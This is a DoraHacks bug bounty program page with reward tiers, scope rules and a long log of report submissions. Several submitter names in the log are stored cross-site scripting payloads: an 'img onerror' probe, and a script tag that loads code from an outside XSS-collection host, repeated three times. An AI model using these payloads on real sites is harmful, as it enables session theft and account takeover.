English
Back
Ongoing229 days left
2024/01/08 → 2025/01/05, 00:00

2024-DoraHacks Bug Bounty

Submit Report
$5000
  • website_application
  • ETH
  • Grant
  • Web3
  • DoraHacks
  • BugBounty
  • Details
  • Activities
Hunter’s Guide
How to earn crypto as a bounty hunter?
View Guide ↗
Rewards by severity level
Up to $300
Critical
Up to $200
High
Up to $100
Medium
Up to $50
Low
Funder
DoraHacks Tech Team
Organization
participants
 
Multiple-winner bounty
In-scope criteria
Help fix DefaultPowerReduction. Only solving the specified problem will be rewareded, and only one person will be rewarded.
Out-of-scope criteria
Everything else is out-of-scope.
details

Program Overview

DoraHacks is a global hacker movement and the world’s most active multi-chain Web3 developer incentive platform.

The platform offers hackathons, bounty, quadratic funding, privacy voting, and other community governance/funding toolkits. In addition, over 40 major Web3 ecosystems are currently using Dora infrastructures to fund their open source communities.

More than 2000 projects from the DoraHacks community have received over $21.5 million in grants and hackathon prizes.

For more information about DoraHacks, please visit https://dorahacks.io

Reward by Threat Level

All bug reports must come with a Proof of Concept (PoC) with an end-effect impacting an asset-in-scope in order to be considered for a reward. Explanations and statements are not accepted as PoC and code is required.

Payouts are handled by the Dorahacks team directly and are denominated in USDC

Submit Form

  • Goole Docs

No Real Attack

No Real Attack to the website, or we won’t provider any bounty reward

Impacts in scope

Smart Contract

  • Critical
    • Direct theft of any user funds
    • Permanent freezing of funds
    • Break the Logic to change the user value, e.g. Vote record, Stakcing Value

Websites and Applications

  • Critical

    • Direct theft of any user funds
  • High

    • Take Over User Account
    • Change Website date without admin permission
  • Medium

    • Change User Data without login
    • Website display or busniess logic error
  • Ignore

    • Theoretical vulnerabilities without any proof or demonstration
    • DDos Attack
    • Attacks requiring physical access to the victim device
    • Reflected plain text injection eg: url parameters, path, etc.
      • This does not exclude reflected HTML injection with or without javascript
      • This does not exclude persistent plain text injection

Contract

Activities
  • femi akarui submmited a reported on 2024/05/17 16:50
    • Critical

  • femi akarui submmited a reported on 2024/05/17 16:32
    • Critical

  • femi akarui submmited a reported on 2024/05/17 16:28
    • Critical

  • whitehorse submmited a reported on 2024/04/14 01:46
    • Critical

  • Huiyang submmited a reported on 2024/04/02 00:16
    • Critical

  • Tyo Rajin Solat submmited a reported on 2024/03/26 17:07
    • Critical

  • Rvblackmamba submmited a reported on 2024/03/25 13:19
    • Critical

  • MxShinzu submmited a reported on 2024/03/25 13:10
    • Critical

  • MxShinzu submmited a reported on 2024/03/25 12:57
    • Critical

  • MxShinzu submmited a reported on 2024/03/25 12:47
    • Critical

  • MxShinzu submmited a reported on 2024/03/25 12:40
    • Critical

  • MxShinzu submmited a reported on 2024/03/25 12:29
    • Critical

  • MxShinzu submmited a reported on 2024/03/25 12:23
    • Critical

  • account_1 submmited a reported on 2024/03/25 09:26
    • Critical

  • account_1 submmited a reported on 2024/03/25 09:18
    • Critical

  • noxa submmited a reported on 2024/03/25 04:13
    • Critical

  • MxShinzu submmited a reported on 2024/03/24 22:02
    • Critical

  • "/><img src=x onerror=alert(/Stored_XSS/)> submmited a reported on 2024/03/24 05:23
    • Critical

  • hacker5808 submmited a reported on 2024/03/24 03:10
    • Critical

  • LazyHengker submmited a reported on 2024/03/24 00:31
    • Critical

  • LazyHengker submmited a reported on 2024/03/23 22:11
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 21:29
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 21:23
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 21:19
    • Critical

  • LazyHengker submmited a reported on 2024/03/23 21:10
    • Critical

  • hacker9c20c94 submmited a reported on 2024/03/23 21:09
    • Critical

  • hacker9c20c94 submmited a reported on 2024/03/23 21:08
    • Critical

  • hacker9c20c94 submmited a reported on 2024/03/23 21:07
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 21:05
    • Critical

  • LazyHengker submmited a reported on 2024/03/23 21:04
    • Critical

  • hacker9c20c94 submmited a reported on 2024/03/23 21:03
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 20:59
    • Critical

  • LazyHengker submmited a reported on 2024/03/23 20:53
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 20:51
    • Critical

  • LazyHengker submmited a reported on 2024/03/23 20:44
    • Critical

  • LazyHengker submmited a reported on 2024/03/23 20:36
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 20:32
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 20:18
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 20:12
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 20:11
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 20:07
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 20:03
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 19:49
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 19:47
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 19:46
    • Critical

  • LazyHengker submmited a reported on 2024/03/23 19:19
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 19:06
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 19:01
    • Critical

  • Milan jain submmited a reported on 2024/03/23 18:58
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 18:57
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 18:53
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 18:40
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 18:29
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 18:16
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 18:12
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 18:08
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 18:00
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 17:35
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 17:32
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 17:24
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 17:15
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 16:43
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 16:27
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 15:43
    • Critical

  • n00b0xe submmited a reported on 2024/03/23 15:41
    • Critical

  • 0xSai submmited a reported on 2024/03/23 14:34
    • Critical

  • 0xSai submmited a reported on 2024/03/23 14:19
    • Critical

  • 0xSai submmited a reported on 2024/03/23 13:23
    • Critical

  • NXR submmited a reported on 2024/03/23 13:08
    • Critical

  • n00b0xe submmited a reported on 2024/03/22 23:17
    • Critical

  • n00b0xe submmited a reported on 2024/03/22 23:17
    • Critical

  • '"><script src=https://xss.report/c/zh></script> submmited a reported on 2024/03/22 01:46
    • Critical

  • Rohan Panchal submmited a reported on 2024/03/15 21:21
    • Critical

  • Rohan Panchal submmited a reported on 2024/03/15 21:19
    • Critical

  • Rohan Panchal submmited a reported on 2024/03/15 21:15
    • Critical

  • D3xcR3T submmited a reported on 2024/03/12 15:54
    • Critical

  • Rvblackmamba submmited a reported on 2024/03/12 14:18
    • Critical

  • Rvblackmamba submmited a reported on 2024/03/12 13:58
    • Critical

  • Wildhan submmited a reported on 2024/03/11 07:36
    • Critical

  • NXR submmited a reported on 2024/03/07 05:26
    • Critical

  • jiahoang submmited a reported on 2024/03/04 18:40
    • Critical

  • jiahoang submmited a reported on 2024/03/04 18:26
    • Critical

  • Abdelrahman-ibrahim-Farg submmited a reported on 2024/03/03 07:52
    • Critical

  • hacker426c23f submmited a reported on 2024/02/26 15:24
    • Critical

  • NXR submmited a reported on 2024/02/22 07:02
    • Critical

  • NXR submmited a reported on 2024/02/22 06:47
    • Critical

  • NXR submmited a reported on 2024/02/22 02:43
    • Critical

  • NXR submmited a reported on 2024/02/22 02:39
    • Critical

  • hacker426c23f submmited a reported on 2024/02/22 00:02
    • Critical

  • hacker426c23f submmited a reported on 2024/02/21 23:34
    • Critical

  • NXR submmited a reported on 2024/02/21 21:42
    • Critical

  • NXR submmited a reported on 2024/02/21 21:01
    • Critical

  • NXR submmited a reported on 2024/02/20 03:41
    • Critical

  • NXR submmited a reported on 2024/02/20 00:17
    • Critical

  • NXR submmited a reported on 2024/02/19 22:26
    • Critical

  • hacker426c23f submmited a reported on 2024/02/19 21:45
    • Critical

  • NXR submmited a reported on 2024/02/19 15:08
    • Critical

  • NXR submmited a reported on 2024/02/19 14:52
    • Critical

  • NXR submmited a reported on 2024/02/19 04:15
    • Critical

  • NXR submmited a reported on 2024/02/19 03:58
    • Critical

  • NXR submmited a reported on 2024/02/18 23:01
    • Critical

  • NXR submmited a reported on 2024/02/18 22:31
    • Critical

  • hacker426c23f submmited a reported on 2024/02/18 18:38
    • Critical

  • hacker426c23f submmited a reported on 2024/02/18 18:22
    • Critical

  • NXR submmited a reported on 2024/02/18 17:43
    • Critical

  • hacker426c23f submmited a reported on 2024/02/18 17:39
    • Critical

  • NXR submmited a reported on 2024/02/18 16:06
    • Critical

  • NXR submmited a reported on 2024/02/18 05:05
    • Critical

  • hacker426c23f submmited a reported on 2024/02/18 03:30
    • Critical

  • NXR submmited a reported on 2024/02/18 01:04
    • Critical

  • NXR submmited a reported on 2024/02/18 00:10
    • Critical

  • hacker426c23f submmited a reported on 2024/02/17 18:46
    • Critical

  • hacker426c23f submmited a reported on 2024/02/17 18:33
    • Critical

  • hacker426c23f submmited a reported on 2024/02/17 17:50
    • Critical

  • '"><script src=https://xss.report/c/zh></script> submmited a reported on 2024/02/17 17:25
    • Critical

  • hacker426c23f submmited a reported on 2024/02/17 16:58
    • Critical

  • '"><script src=https://xss.report/c/zh></script> submmited a reported on 2024/02/16 15:54
    • Critical

  • hacker426c23f submmited a reported on 2024/02/16 01:19
    • Critical

  • hacker426c23f submmited a reported on 2024/02/16 00:16
    • Critical

  • hacker67aada6 submmited a reported on 2024/02/15 23:49
    • Critical

  • hacker426c23f submmited a reported on 2024/02/15 22:58
    • Critical

  • hacker426c23f submmited a reported on 2024/02/15 17:17
    • Critical

  • hacker426c23f submmited a reported on 2024/02/15 16:45
    • Critical

  • rise1507 submmited a reported on 2024/02/15 12:48
    • Critical

  • hacker5c00f12 submmited a reported on 2024/02/14 15:55
    • Critical

  • hacker5c00f12 submmited a reported on 2024/02/14 15:52
    • Critical

  • Nith567 submmited a reported on 2024/02/13 18:37
    • Critical

  • hacker1fa173d submmited a reported on 2024/02/12 16:53
    • Critical

  • jiahoang submmited a reported on 2024/02/12 12:15
    • Critical

  • jiahoang submmited a reported on 2024/02/08 11:10
    • Critical

  • hacker1fa173d submmited a reported on 2024/02/03 18:02
    • Critical

  • Kaalop1 submmited a reported on 2024/01/26 07:53
    • Critical

  • hacker426c23f submmited a reported on 2024/01/20 21:59
    • Critical

  • hacker426c23f submmited a reported on 2024/01/20 19:42
    • Critical

  • hacker5c00f12 submmited a reported on 2024/01/20 18:02
    • Critical

  • hacker5c00f12 submmited a reported on 2024/01/20 17:55
    • Critical

  • hacker426c23f submmited a reported on 2024/01/20 15:13
    • Critical

  • novemberelang submmited a reported on 2024/01/20 02:33
    • Critical

  • The bounty was created on 2024/01/08 21:58